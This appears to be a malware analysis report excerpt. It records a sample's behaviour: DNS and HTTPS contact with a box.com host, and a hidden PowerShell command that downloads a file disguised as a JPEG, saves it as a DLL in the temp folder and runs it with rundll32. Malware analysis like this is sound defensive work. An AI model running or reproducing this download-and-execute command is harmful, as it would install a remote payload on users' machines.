Technical Information
- https://moroconfortoltdame.box.com/shared/static/bvukbse33im2e9ymokxhwf70dh3s8a0z.jpg as %temp%\mqcdivy_user_ehjhf.dll
- 'mo######ortoltdame.box.com':443
- 'mo######ortoltdame.box.com':443
- DNS ASK mo######ortoltdame.box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-object system.Net.webclieNt).dowNloadfile('""https://moroconfortoltdame.box.com/shared/static/bvukbse33im2e9ymokxhwf70dh3s8a0z.jpg','%TEMP%\mqcdivy_user_ehjhf.dll');start-process rUNdll32....' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\mqcdivy_user_ehjhf.dll starter